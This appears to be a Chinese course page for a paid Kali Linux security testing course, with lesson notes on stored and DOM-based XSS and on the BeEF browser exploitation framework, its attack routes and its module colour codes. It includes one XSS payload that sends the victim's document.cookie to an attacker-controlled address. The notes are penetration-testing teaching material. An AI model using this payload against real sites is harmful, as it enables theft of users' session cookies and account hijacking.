846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

存储型XSS

 长期存储于服务器

 每次用户访问多会被执行

利用

 截断代理、客户端(直接在本地html修改限制)

DOM型XSS(也属于反射型)

 利用DOM对象

 利用方法

 <script>var img=document.createElement("img");img.src="http://192.168.20.8:88/log?"+escape(document.cookie);</script>

BEEF

 浏览器漏洞利用框架

 浏览器攻击面

 应用普遍转移到B/S架构,浏览器称为统一的客户端程序

 结合社工方法对浏览器进行攻击

 攻击浏览器用户

 通过注入js脚本,利用浏览器攻击其他网站

 (Browser exploitation framework)

 生成 交付 payload

 Ruby语言编写

 服务器端:管理hooked客户端 

 客户端:运行于客户端浏览器上的js脚本(hook)

 攻击手段(典型的)

 利用XSS

 诱使客户端访问hook的伪造站点

 结合中间人攻击注入hook脚本

 常见用途

 键盘记录器

 网络扫描

 浏览器信息收集

 绑定shell

 与metasploit集成

 Commands 命令模块

 绿色 表示模块适合目标浏览器,并且执行结果客户端看不见

 红色 模块不适用于目标浏览器,但是有的可以执行

 橙色 模块可用,但结果对用户可见(CAM弹窗申请权限等)

 灰色 模块未在目标浏览器上测试过

 

[展开全文]